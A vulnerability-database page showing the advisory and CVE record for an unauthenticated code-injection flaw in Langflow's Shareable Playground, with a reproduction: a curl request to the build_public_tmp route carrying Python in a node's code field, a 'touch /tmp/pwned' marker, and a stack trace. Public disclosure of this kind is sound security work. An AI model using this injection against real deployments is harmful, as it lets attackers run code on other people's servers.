Vulnerability-Lookup

GHSA-V5FF-9Q35-Q26F

Vulnerability from github – Published: 2026-06-16 17:35 – Updated: 2026-06-16 17:35

Summary

Langflow: Unauthenticated RCE in Shareable Playgrounds

Details

Summary

The "Shareable Playground" (or "Public Flows" in code) contains a critical RCE vulnerability. Simply sharing a flow exposes the deployment to RCE risk by authenticated users.

Tested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe

Details

Shareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link. Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID. When the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload!

The vulnerable field is data.nodes[X].data.node.template.code.value. See PoC for an example.

PoC

Reproduction: 1. Create a new flow and add a Chat Input node to it 2. Share the flow ("Shareable Playground") 3. Access the public link with the browser developers tools open and execute the flow. 4. Find the /api/v1/build_public_tmp route and copy as cURL 5. Edit the data.nodes[X].data.node.template.code.value JSON field with any python code and run the cURL command.

Example PoC (replace flow ID with the correct one), and download test_with_python.json:

curl 'http://localhost:7860/api/v1/build_public_tmp/<flow-id>/flow?start_component_id=ChatInput-syEJp&log_builds=false&event_delivery=streaming' \
  -H 'Content-Type: application/json' \
  -b 'client_id=anything' \
  --data-raw "$(cat test_with_python.json)"

Search for touch /tmp/pwned in the test_with_python.json and edit for any other code.

The stacktrace for the code executed is:

...
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 495, in generate_flow_events
    ids, vertices_to_run, graph = await build_graph_and_get_order()
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 234, in build_graph_and_get_order
    graph = await create_graph(fresh_session, flow_id_str, flow_name)
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py", line 298, in create_graph
    return await build_graph_from_data(
  File "/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/utils/core.py", line 192, in build_graph_from_data
    graph = Graph.from_payload(payload, str_flow_id, flow_name, kwargs.get("user_id"))
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1153, in from_payload
    graph.add_nodes_and_edges(vertices, edges)
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 270, in add_nodes_and_edges
    self.initialize()
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 512, in initialize
    self._build_graph()
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1305, in _build_graph
    self._instantiate_components_in_vertices()
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py", line 1347, in _instantiate_components_in_vertices
    vertex.instantiate_component(self.user_id)
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/vertex/base.py", line 382, in instantiate_component
    self.custom_component, _ = initialize.loading.instantiate_class(
  File "/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/interface/initialize/loading.py", line 45, in instantiate_class
    custom_component: CustomComponent | Component = class_object(
  File "<string>", line 59, in __init__

Impact

Unauthenticated RCE on any deployment with a shareable playground.

Ori Lahav Security Researcher @ Rubrik Inc.

Severity

9.6 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.9.1"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "langflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.9.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48519"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T17:35:32Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nThe \"Shareable Playground\" (or \"Public Flows\" in code) contains a critical RCE vulnerability.\nSimply sharing a flow exposes the deployment to RCE risk by authenticated users.\n\nTested on commit 2d67402b1dbaefcbce85a244d4a6cd5e4bda1cfe\n\n### Details\nShareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link.\nSpecifically, it enables the route `/api/v1/build_public_tmp` to execute any public flow, given a public flow ID.\nWhen the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload!\n\nThe vulnerable field is data.nodes[X].data.node.template.code.value. See PoC for an example.\n\n### PoC\nReproduction:\n1. Create a new flow and add a Chat Input node to it\n2. Share the flow (\"Shareable Playground\")\n3. Access the public link with the browser developers tools open and execute the flow.\n4. Find the `/api/v1/build_public_tmp` route and copy as cURL\n5. Edit the `data.nodes[X].data.node.template.code.value` JSON field with any python code and run the cURL command.\n\nExample PoC (replace flow ID with the correct one), and download [test_with_python.json](https://github.com/user-attachments/files/25159927/test_with_python.json):\n```bash\ncurl \u0027http://localhost:7860/api/v1/build_public_tmp/\u003cflow-id\u003e/flow?start_component_id=ChatInput-syEJp\u0026log_builds=false\u0026event_delivery=streaming\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -b \u0027client_id=anything\u0027 \\\n  --data-raw \"$(cat test_with_python.json)\"\n```\nSearch for `touch /tmp/pwned` in the `test_with_python.json` and edit for any other code.\n\n\n\nThe stacktrace for the code executed is:\n```\n...\n  File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py\", line 495, in generate_flow_events\n    ids, vertices_to_run, graph = await build_graph_and_get_order()\n  File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py\", line 234, in build_graph_and_get_order\n    graph = await create_graph(fresh_session, flow_id_str, flow_name)\n  File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/build.py\", line 298, in create_graph\n    return await build_graph_from_data(\n  File \"/Users/ori/Work/research/langchain/langflow/src/backend/base/langflow/api/utils/core.py\", line 192, in build_graph_from_data\n    graph = Graph.from_payload(payload, str_flow_id, flow_name, kwargs.get(\"user_id\"))\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 1153, in from_payload\n    graph.add_nodes_and_edges(vertices, edges)\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 270, in add_nodes_and_edges\n    self.initialize()\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 512, in initialize\n    self._build_graph()\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 1305, in _build_graph\n    self._instantiate_components_in_vertices()\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/graph/base.py\", line 1347, in _instantiate_components_in_vertices\n    vertex.instantiate_component(self.user_id)\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/graph/vertex/base.py\", line 382, in instantiate_component\n    self.custom_component, _ = initialize.loading.instantiate_class(\n  File \"/Users/ori/Work/research/langchain/langflow/src/lfx/src/lfx/interface/initialize/loading.py\", line 45, in instantiate_class\n    custom_component: CustomComponent | Component = class_object(\n  File \"\u003cstring\u003e\", line 59, in __init__\n```\n\n### Impact\nUnauthenticated RCE on any deployment with a shareable playground.\n\n\n\nOri Lahav\nSecurity Researcher @ Rubrik Inc.",
  "id": "GHSA-v5ff-9q35-q26f",
  "modified": "2026-06-16T17:35:32Z",
  "published": "2026-06-16T17:35:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langflow-ai/langflow"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Langflow: Unauthenticated RCE in Shareable Playgrounds"
}

CVE-2026-48519 (GCVE-0-2026-48519)

Vulnerability from cvelistv5 – Published: 2026-06-23 16:25 – Updated: 2026-06-23 17:02

Title

Langflow: Unauthenticated RCE in Shareable Playgrounds

Summary

Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to 1.9.2, the "Shareable Playground" (or "Public Flows" in code) contains a critical RCE vulnerability. Shareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link. Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID. When the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload. The vulnerable field is data.nodes[X].data.node.template.code.value. This vulnerability is fixed in 1.9.2.

Severity

9.6 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

SSVC

Exploitation: poc Automatable: no Technical Impact: total

CISA Coordinator (v2.0.3)

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/langflow-ai/langflow/security/…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
langflow-ai	langflow	Affected: < 1.9.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-48519",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-23T17:02:06.128322Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-23T17:02:49.695Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "langflow",
          "vendor": "langflow-ai",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.9.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to 1.9.2, the \"Shareable Playground\" (or \"Public Flows\" in code) contains a critical RCE vulnerability. Shareable Playground feature works by enabling the execution of workflows by unauthenticated users, by accessing a link. Specifically, it enables the route /api/v1/build_public_tmp to execute any public flow, given a public flow ID. When the route executes the flow, it allows for providing arbitrary custom Python code as the nodes code, inside the JSON payload. The vulnerable field is data.nodes[X].data.node.template.code.value. This vulnerability is fixed in 1.9.2."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.6,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-23T16:25:09.927Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/langflow-ai/langflow/security/advisories/GHSA-v5ff-9q35-q26f"
        }
      ],
      "source": {
        "advisory": "GHSA-v5ff-9q35-q26f",
        "discovery": "UNKNOWN"
      },
      "title": "Langflow: Unauthenticated RCE in Shareable Playgrounds"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-48519",
    "datePublished": "2026-06-23T16:25:09.927Z",
    "dateReserved": "2026-05-21T16:18:10.619Z",
    "dateUpdated": "2026-06-23T17:02:49.695Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-V5FF-9Q35-Q26F

Summary

Details

PoC

Impact

CVE-2026-48519 (GCVE-0-2026-48519)

Tags

Sightings

Nomenclature